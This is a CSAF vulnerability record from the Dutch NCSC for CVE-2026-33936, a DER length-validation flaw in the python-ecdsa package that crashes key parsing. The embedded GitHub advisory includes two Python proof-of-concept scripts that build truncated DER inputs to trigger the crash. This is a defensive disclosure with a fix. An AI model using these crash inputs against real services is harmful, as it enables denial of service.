{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33936", "tracking": { "current_release_date": "2026-04-01T14:48:23.719840Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33936", "initial_release_date": "2026-03-28T07:40:28.998486Z", "revision_history": [ { "date": "2026-03-28T07:40:28.998486Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-28T07:40:39.792928Z", "number": "2", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-28T07:40:43.361407Z", "number": "3", "summary": "NCSC Score created." }, { "date": "2026-03-28T07:41:32.115859Z", "number": "4", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-28T07:41:33.677923Z", "number": "5", "summary": "NCSC Score updated." }, { "date": "2026-03-28T07:43:08.118706Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-28T12:44:26.823302Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| Products connected (2)." }, { "date": "2026-03-28T12:44:32.475392Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-29T00:38:32.512770Z", "number": "9", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-29T12:19:57.703976Z", "number": "10", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| CWES updated (1)." }, { "date": "2026-03-30T12:32:46.315170Z", "number": "11", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (3).| Product Identifiers created (3).| Products created (3).| References created (5).| CWES updated (1).| Vendor_assessment created." }, { "date": "2026-03-30T12:32:50.047537Z", "number": "12", "summary": "NCSC Score updated." }, { "date": "2026-03-30T20:47:10.918934Z", "number": "13", "summary": "References created (1)." }, { "date": "2026-03-31T06:19:51.354831Z", "number": "14", "summary": "Products created (1).| Product Identifiers created (1)." }, { "date": "2026-04-01T07:10:52.681744Z", "number": "15", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| Products created (1)." }, { "date": "2026-04-01T07:10:57.868956Z", "number": "16", "summary": "NCSC Score updated." }, { "date": "2026-04-01T13:25:03.645743Z", "number": "17", "summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-04-01T13:25:07.071246Z", "number": "18", "summary": "NCSC Score updated." }, { "date": "2026-04-01T14:39:35.415663Z", "number": "19", "summary": "Unknown change." } ], "status": "interim", "version": "19" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<0.19.2", "product": { "name": "vers:unknown/<0.19.2", "product_id": "CSAFPID-5973147", "product_identification_helper": { "cpe": "cpe:2.3:a:tlsfuzzer:ecdsa:*:*:*:*:*:python:*:*" } } } ], "category": "product_name", "name": "ECDSA" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<0.19.2", "product": { "name": "vers:unknown/<0.19.2", "product_id": "CSAFPID-5956305" } } ], "category": "product_name", "name": "python-ecdsa" } ], "category": "vendor", "name": "Tlsfuzzer" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2", "product": { "name": "vers:rpm/2", "product_id": "CSAFPID-1508257", "product_identification_helper": { "cpe": "cpe:/a:redhat:ansible_automation_platform:2" } } } ], "category": "product_name", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/6", "product": { "name": "vers:rpm/6", "product_id": "CSAFPID-1439313", "product_identification_helper": { "cpe": "cpe:/a:redhat:satellite:6" } } } ], "category": "product_name", "name": "Red Hat Satellite 6" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/4", "product": { "name": "vers:rpm/4", "product_id": "CSAFPID-1771989", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhui:4::el8" } } } ], "category": "product_name", "name": "Red Hat Update Infrastructure 4 for Cloud Providers" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5963658" } } ], "category": "product_name", "name": "python-ecdsa" } ], "category": "product_family", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5963659" } } ], "category": "product_name", "name": "python-ecdsa" } ], "category": "product_family", "name": "Red Hat Satellite 6" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5963660" } } ], "category": "product_name", "name": "python-ecdsa" } ], "category": "product_family", "name": "Red Hat Update Infrastructure 4 for Cloud Providers" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:microsoft/*", "product": { "name": "vers:microsoft/*", "product_id": "CSAFPID-5967085", "product_identification_helper": { "cpe": "cpe:2.3:a:microsoft:azl3_python-ecdsa_0.18.0-2:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "azl3 python-ecdsa 0.18.0-2 on Azure Linux 3.0" } ], "category": "product_family", "name": "Open Source Software" } ], "category": "vendor", "name": "Microsoft" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<0.19.2", "product": { "name": "vers:unknown/<0.19.2", "product_id": "CSAFPID-5970822" } } ], "category": "product_name", "name": "ecdsa" } ], "category": "vendor", "name": "unknown" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-1404993" } } ], "category": "product_name", "name": "python-ecdsa" } ], "category": "product_family", "name": "bookworm" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-1404994" } } ], "category": "product_name", "name": "python-ecdsa" } ], "category": "product_family", "name": "bullseye" } ], "category": "vendor", "name": "Debian" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33936", "cwe": { "id": "CWE-130", "name": "Improper Handling of Length Parameter Inconsistency" }, "notes": [ { "category": "description", "text": "The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA (Edwards-curve Digital Signature Algorithm) and ECDH (Elliptic Curve Diffie-Hellman). Prior to version 0.19.2, an issue in the low-level DER parsing functions can cause unexpected exceptions to be raised from the public API functions. `ecdsa.der.remove_octet_string()` accepts truncated DER where the encoded length exceeds the available buffer. For example, an OCTET STRING that declares a length of 4096 bytes but provides only 3 bytes is parsed successfully instead of being rejected. Because of that, a crafted DER input can cause `SigningKey.from_der()` to raise an internal exception (`IndexError: index out of bounds on dimension 1`) rather than cleanly rejecting malformed DER (e.g., raising `UnexpectedDER` or `ValueError`). Applications that parse untrusted DER private keys may crash if they do not handle unexpected exceptions, resulting in a denial of service. Version 0.19.2 patches the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33936.json" }, { "category": "description", "text": "The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA (Edwards-curve Digital Signature Algorithm) and ECDH (Elliptic Curve Diffie-Hellman). Prior to version 0.19.2, an issue in the low-level DER parsing functions can cause unexpected exceptions to be raised from the public API functions. `ecdsa.der.remove_octet_string()` accepts truncated DER where the encoded length exceeds the available buffer. For example, an OCTET STRING that declares a length of 4096 bytes but provides only 3 bytes is parsed successfully instead of being rejected. Because of that, a crafted DER input can cause `SigningKey.from_der()` to raise an internal exception (`IndexError: index out of bounds on dimension 1`) rather than cleanly rejecting malformed DER (e.g., raising `UnexpectedDER` or `ValueError`). Applications that parse untrusted DER private keys may crash if they do not handle unexpected exceptions, resulting in a denial of service. Version 0.19.2 patches the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33936" }, { "category": "description", "text": "## Summary\n\nAn issue in the low-level DER parsing functions can cause unexpected exceptions to be raised from the public API functions.\n\n1. `ecdsa.der.remove_octet_string()` accepts truncated DER where the encoded length exceeds the available buffer. For example, an OCTET STRING that declares a length of 4096 bytes but provides only 3 bytes is parsed successfully instead of being rejected.\n\n2. Because of that, a crafted DER input can cause `SigningKey.from_der()` to raise an internal exception (`IndexError: index out of bounds on dimension 1`) rather than cleanly rejecting malformed DER (e.g., raising `UnexpectedDER` or `ValueError`). Applications that parse untrusted DER private keys may crash if they do not handle unexpected exceptions, resulting in a denial of service.\n\n## Impact\n\nPotential denial-of-service when parsing untrusted DER private keys due to unexpected internal exceptions, and malformed DER acceptance due to missing bounds checks in DER helper functions.\n\n## Reproduction\n\nAttach and run the following PoCs:\n\n### poc_truncated_der_octet.py\n\n```python\nfrom ecdsa.der import remove_octet_string, UnexpectedDER\n\n# OCTET STRING (0x04)\n# Declared length: 0x82 0x10 0x00 -> 4096 bytes\n# Actual body: only 3 bytes -> truncated DER\nbad = b\"\\x04\\x82\\x10\\x00\" + b\"ABC\"\n\ntry:\n body, rest = remove_octet_string(bad)\n print(\"[BUG] remove_octet_string accepted truncated DER.\")\n print(\"Declared length=4096, actual body_len=\", len(body), \"rest_len=\", len(rest))\n print(\"Body=\", body)\n print(\"Rest=\", rest)\nexcept UnexpectedDER as e:\n print(\"[OK] Rejected malformed DER:\", e)\n```\n\n- Expected: reject malformed DER when declared length exceeds available bytes\n- Actual: accepts the truncated DER and returns a shorter body\n- Example output:\n```\nParsed body_len= 3 rest_len= 0 (while declared length is 4096)\n```\n\n### poc_signingkey_from_der_indexerror.py\n\n```python\nfrom ecdsa import SigningKey, NIST256p\nimport ecdsa\n\nprint(\"ecdsa version:\", ecdsa.__version__)\n\nsk = SigningKey.generate(curve=NIST256p)\ngood = sk.to_der()\nprint(\"Good DER len:\", len(good))\n\n\ndef find_crashing_mutation(data: bytes):\n b = bytearray(data)\n\n # Try every OCTET STRING tag position and corrupt a short-form length byte\n for i in range(len(b) - 4):\n if b[i] != 0x04: # OCTET STRING tag\n continue\n\n L = b[i + 1]\n if L >= 0x80:\n # skip long-form lengths for simplicity\n continue\n\n max_possible = len(b) - (i + 2)\n if max_possible <= 10:\n continue\n\n # Claim more bytes than exist -> truncation\n newL = min(0x7F, max_possible + 20)\n b2 = bytearray(b)\n b2[i + 1] = newL\n\n try:\n SigningKey.from_der(bytes(b2))\n except Exception as e:\n return i, type(e).__name__, str(e)\n\n return None\n\n\nres = find_crashing_mutation(good)\nif res is None:\n print(\"[INFO] No exception triggered by this mutation strategy.\")\nelse:\n i, etype, msg = res\n print(\"[BUG] SigningKey.from_der raised unexpected exception type.\")\n print(\"Offset:\", i, \"Exception:\", etype, \"Message:\", msg)\n```\n\n- Expected: reject malformed DER with `UnexpectedDER` or `ValueError`\n- Actual: deterministically triggers an internal `IndexError` (DoS risk)\n- Example output:\n```\nResult: (5, 'IndexError', 'index out of bounds on dimension 1')\n```\n\n## Suggested fix\n\nAdd “declared length must fit buffer” checks in DER helper functions similarly to the existing check in `remove_sequence()`:\n\n- `remove_octet_string()`\n- `remove_constructed()`\n- `remove_implicit()`\n\nAdditionally, consider catching unexpected internal exceptions in DER key parsing paths and re-raising them as `UnexpectedDER` to avoid crashy failure modes.\n\n## Credit\n\nMohamed Abdelaal (@0xmrma)", "title": "github - https://api.github.com/advisories/GHSA-9f5j-8jwj-x28g" }, { "category": "description", "text": "The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA (Edwards-curve Digital Signature Algorithm) and ECDH (Elliptic Curve Diffie-Hellman). Prior to version 0.19.2, an issue in the low-level DER parsing functions can cause unexpected exceptions to be raised from the public API functions. `ecdsa.der.remove_octet_string()` accepts truncated DER where the encoded length exceeds the available buffer. For example, an OCTET STRING that declares a length of 4096 bytes but provides only 3 bytes is parsed successfully instead of being rejected. Because of that, a crafted DER input can cause `SigningKey.from_der()` to raise an internal exception (`IndexError: index out of bounds on dimension 1`) rather than cleanly rejecting malformed DER (e.g., raising `UnexpectedDER` or `ValueError`). Applications that parse untrusted DER private keys may crash if they do not handle unexpected exceptions, resulting in a denial of service. Version 0.19.2 patches the issue.", "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-33936" }, { "category": "description", "text": "python-ecdsa: Denial of Service via improper DER length validation in crafted private keys", "title": "microsoft - https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar" }, { "category": "description", "text": "The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA (Edwards-curve Digital Signature Algorithm) and ECDH (Elliptic Curve Diffie-Hellman). Prior to version 0.19.2, an issue in the low-level DER parsing functions can cause unexpected exceptions to be raised from the public API functions. `ecdsa.der.remove_octet_string()` accepts truncated DER where the encoded length exceeds the available buffer. For example, an OCTET STRING that declares a length of 4096 bytes but provides only 3 bytes is parsed successfully instead of being rejected. Because of that, a crafted DER input can cause `SigningKey.from_der()` to raise an internal exception (`IndexError: index out of bounds on dimension 1`) rather than cleanly rejecting malformed DER (e.g., raising `UnexpectedDER` or `ValueError`). Applications that parse untrusted DER private keys may crash if they do not handle unexpected exceptions, resulting in a denial of service. Version 0.19.2 patches the issue.\nA flaw was found in the `ecdsa` Python package, which is used for cryptographic operations. A remote attacker can exploit this vulnerability by sending a specially crafted data input, known as Distinguished Encoding Rules (DER). This malformed input can cause applications that process untrusted cryptographic keys to crash, leading to a denial of service.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33936.json" }, { "category": "description", "text": "Affected versions of the python-ecdsa package are vulnerable to Denial of Service due to improper validation of DER length fields in malformed private keys. The ecdsa.der.remove_octet_string() function accepts truncated DER input when the declared length exceeds the available buffer, and this malformed data can then reach SigningKey.from_der(), which may raise an internal IndexError instead of safely rejecting the input with UnexpectedDER or ValueError.", "title": "pyupio - https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json" }, { "category": "other", "text": "0.00047", "title": "EPSS" }, { "category": "other", "text": "4.4", "title": "NCSC Score" }, { "category": "other", "text": "There is cwe data available from source Microsoft", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "Is related to a product by vendor Unknown, There is exploit data available from source Nvd", "title": "NCSC Score top decreasing factors" }, { "category": "details", "text": "Severity: 2\n", "title": "Vendor assessment" } ], "product_status": { "known_affected": [ "CSAFPID-5956305", "CSAFPID-1404993", "CSAFPID-1404994", "CSAFPID-1439313", "CSAFPID-1508257", "CSAFPID-1771989", "CSAFPID-5963658", "CSAFPID-5963659", "CSAFPID-5963660", "CSAFPID-5967085", "CSAFPID-5970822", "CSAFPID-5973147" ] }, "references": [ { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33936.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33936" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-9f5j-8jwj-x28g" }, { "category": "external", "summary": "Source - debian", "url": "https://security-tracker.debian.org/tracker/CVE-2026-33936" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - microsoft", "url": "https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33936.json" }, { "category": "external", "summary": "Source - pyupio", "url": "https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; redhat", "url": "https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-9f5j-8jwj-x28g" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; redhat", "url": "https://github.com/tlsfuzzer/python-ecdsa/commit/bd66899550d7185939bf27b75713a2ac9325a9d3" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; redhat", "url": "https://github.com/tlsfuzzer/python-ecdsa/releases/tag/python-ecdsa-0.19.2" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-9f5j-8jwj-x28g" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-33936" }, { "category": "external", "summary": "Reference - github; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33936" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM" }, "products": [ "CSAFPID-1404993", "CSAFPID-1404994", "CSAFPID-1439313", "CSAFPID-1508257", "CSAFPID-1771989", "CSAFPID-5956305", "CSAFPID-5963658", "CSAFPID-5963659", "CSAFPID-5963660", "CSAFPID-5967085", "CSAFPID-5970822", "CSAFPID-5973147" ] } ], "title": "CVE-2026-33936" } ] }